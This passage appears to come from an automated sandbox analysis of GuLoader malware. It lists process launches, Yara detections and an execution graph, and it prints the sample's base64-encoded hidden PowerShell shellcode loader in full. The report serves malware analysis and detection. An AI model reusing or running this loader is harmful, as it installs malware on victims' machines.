E8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
                          Imagebase:0xf70000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp, Author: Joe Security

                          General

                          Start time:11:27:08
                          Start date:25/11/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
                          Imagebase:0xf70000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp, Author: Joe Security

                          General

                          Start time:11:27:26
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
                          Imagebase:0xdd0000
                          File size:2141552 bytes
                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:11:27:27
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
                          Imagebase:0x9b0000
                          File size:46832 bytes
                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Start time:11:27:42
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
                          Imagebase:0xdd0000
                          File size:2141552 bytes
                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET

                          General

                          Start time:11:27:43
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"
                          Imagebase:0x9b0000
                          File size:46832 bytes
                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Start time:11:27:51
                          Start date:25/11/2021
                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                          Imagebase:0xca0000
                          File size:480256 bytes
                          MD5 hash:7871873BABCEA94FBA13900B561C7C55
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000000.15958445085.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security

                          General

                          Start time:11:28:06
                          Start date:25/11/2021
                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                          Imagebase:0xca0000
                          File size:480256 bytes
                          MD5 hash:7871873BABCEA94FBA13900B561C7C55
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.16334182427.0000000003000000.00000040.00000001.sdmp, Author: Joe Security

                          Disassembly

                          Code Analysis

                          Reset < >

                            Execution Graph

                            Execution Coverage:10.3%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5%
                            Total number of Nodes:221
                            Total number of Limit Nodes:10

                            Graph

                            execution_graph 66285 4899028 66286 4899050 66285->66286 66287 4896000 GetFileAttributesW 66286->66287 66288 489ad29 66287->66288 66289 48917e8 66290 48917fa 66289->66290 66292 48947d8 GetFileAttributesW 66290->66292 66293 48947e8 GetFileAttributesW 66290->66293 66291 489182a 66292->66291 66293->66291 66294 83c5248 66297 83c5261 66294->66297 66295 83c52ca 66296 83c52bd 66297->66295 66300 83c5988 66297->66300 66304 83c5978 66297->66304 66302 83c59ae 66300->66302 66303 83c5ab8 66300->66303 66302->66303 66308 83c54a4 66302->66308 66303->66296 66306 83c5988 66304->66306 66305 83c54a4 CreateNamedPipeW 66307 83c5ab8 66305->66307 66306->66305 66306->66307 66307->66296 66309 83c5c68 CreateNamedPipeW 66308->66309 66311 83c5d9a 66309->66311 66312 8485830 66313 848583c 66312->66313 66314 848585e 66312->66314 66313->66314 66315 8485250 SetThreadUILanguage 66313->66315 66316 8485260 SetThreadUILanguage 66313->66316 66315->66313 66316->66313 66206 4895fd0 66210 4896000 66206->66210 66215 4895ff1 66206->66215 66207 4895fe8 66211 4896022 66210->66211 66220 48964e0 66211->66220 66225 48964f0 66211->66225 66212 489637a 66212->66207 66216 4896000 66215->66216 66218 48964e0 GetFileAttributesW 66216->66218 66219 48964f0 GetFileAttributesW 66216->66219 66217 489637a 66217->66207 66218->66217 66219->66217 66221 4896508 66220->66221 66222 489651d 66221->66222 66230 4895598 66221->66230 66222->66212 66226 4896508 66225->66226 66227 489651d 66226->66227 66228 4895598 GetFileAttributesW 66226->66228 66227->66212 66229 489654e 66228->66229 66229->66212 66231 4896bd0 GetFileAttributesW 66230->66231 66233 489654e 66231->66233 66233->66212 66052 826cf28 66054 826cf4d 66052->66054 66053 826cf87 66054->66053 66057 8481d38 66054->66057 66061 8481d27 66054->66061 66066 8481b08 66057->66066 66071 8481ae9 66057->66071 66058 8481d67 66058->66058 66062 8481d38 66061->66062 66064 8481b08 SetThreadUILanguage 66062->66064 66065 8481ae9 SetThreadUILanguage 66062->66065 66063 8481d67 66064->66063 66065->66063 66067 8481b31 66066->66067 66076 8481788 66067->66076 66081 8481798 66067->66081 66068 8481bf1 66068->66058 66072 8481b08 66071->66072 66074 8481788 SetThreadUILanguage 66072->66074 66075 8481798 SetThreadUILanguage 66072->66075 66073 8481bf1 66073->66058 66074->66073 66075->66073 66077 8481798 66076->66077 66086 8480400 66077->66086 66090 8480448 66077->66090 66078 84817df 66078->66068 66082 84817ad 66081->66082 66084 8480448 SetThreadUILanguage 66082->66084 66085 8480400 SetThreadUILanguage 66082->66085 66083 84817df 66083->66068 66084->66083 66085->66083 66087 8480405 66086->66087 66088 8480464 66087->66088 66094 8480c5b 66087->66094 66088->66078 66091 848045a 66090->66091 66092 8480464 66090->66092 66091->66092 66093 8480c5b SetThreadUILanguage 66091->66093 66092->66078 66093->66092 66098 8485d70 66094->66098 66104 8485d5b 66094->66104 66095 8480c66 66095->66088 66099 8485ffb 66098->66099 66100 8485d99 66098->66100 66101 8485e16 66100->66101 66110 8485260 66100->66110 66118 8485250 66100->66118 66101->66095 66105 8485ffb 66104->66105 66106 8485d99 66104->66106 66107 8485e16 66106->66107 66108 8485250 SetThreadUILanguage 66106->66108 66109 8485260 SetThreadUILanguage 66106->66109 66107->66095 66108->66107 66109->66107 66113 8485288 66110->66113 66111 84853fe 66114 8485418 66111->66114 66130 8483638 66111->66130 66140 84837e1 66111->66140 66147 8483628 66111->66147 66113->66111 66126 8482928 66113->66126 66120 848525a 66118->66120 66119 84853fe 66122 8485418 66119->66122 66123 8483628 SetThreadUILanguage 66119->66123 66124 8483638 SetThreadUILanguage 66119->66124 66125 84837e1 SetThreadUILanguage 66119->66125 66120->66119 66121 8482928 SetThreadUILanguage 66120->66121 66121->66119 66123->66122 66124->66122 66125->66122 66127 84870e0 SetThreadUILanguage 66126->66127 66129 8487151 66127->66129 66129->66111 66132 8483674 66130->66132 66131 84837b4 66171 8482cb7 66131->66171 66176 8482940 66131->66176 66181 8482950 66131->66181 66186 8482b17 66131->66186 66132->66131 66157 8483090 66132->66157 66164 8483080 66132->66164 66133 84838c7 66141 84837ef 66140->66141 66143 8482940 SetThreadUILanguage 66141->66143 66144 8482950 SetThreadUILanguage 66141->66144 66145 8482b17 SetThreadUILanguage 66141->66145 66146 8482cb7 SetThreadUILanguage 66141->66146 66142 84838c7 66143->66142 66144->66142 66145->66142 66146->66142 66149 8483674 66147->66149 66148 84837b4 66153 8482940 SetThreadUILanguage 66148->66153 66154 8482950 SetThreadUILanguage 66148->66154 66155 8482b17 SetThreadUILanguage 66148->66155 66156 8482cb7 SetThreadUILanguage 66148->66156 66149->66148 66151 8483080 SetThreadUILanguage 66149->66151 66152 8483090 SetThreadUILanguage 66149->66152 66150 84838c7 66151->66149 66152->66149 66153->66150 66154->66150 66155->66150 66156->66150 66158 84830ab 66157->66158 66159 84830e7 66158->66159 66160 8482940 SetThreadUILanguage 66158->66160 66161 8482950 SetThreadUILanguage 66158->66161 66162 8482b17 SetThreadUILanguage 66158->66162 66163 8482cb7 SetThreadUILanguage 66158->66163 66159->66132 66160->66159 66161->66159 66162->66159 66163->66159 66165 8483090 66164->66165 66166 84830e7 66165->66166 66167 8482940 SetThreadUILanguage 66165->66167 66168 8482950 SetThreadUILanguage 66165->66168 66169 8482b17 SetThreadUILanguage 66165->66169 66170 8482cb7 SetThreadUILanguage 66165->66170 66166->66132 66167->66166 66168->66166 66169->66166 66170->66166 66172 8482ca2 66171->66172 66173 84829c7 66171->66173 66172->66133 66173->66172 66191 8481dc0 66173->66191 66198 8481dab 66173->66198 66177 8482979 66176->66177 66178 8482ca2 66176->66178 66177->66178 66179 8481dab SetThreadUILanguage 66177->66179 66180 8481dc0 SetThreadUILanguage 66177->66180 66178->66133 66179->66177 66180->66177 66182 8482979 66181->66182 66183 8482ca2 66181->66183 66182->66183 66184 8481dab SetThreadUILanguage 66182->66184 66185 8481dc0 SetThreadUILanguage 66182->66185 66183->66133 66184->66182 66185->66182 66188 84829c7 66186->66188 66187 8482ca2 66187->66133 66188->66187 66189 8481dab SetThreadUILanguage 66188->66189 66190 8481dc0 SetThreadUILanguage 66188->66190 66189->66188 66190->66188 66194 8481d38 SetThreadUILanguage 66191->66194 66195 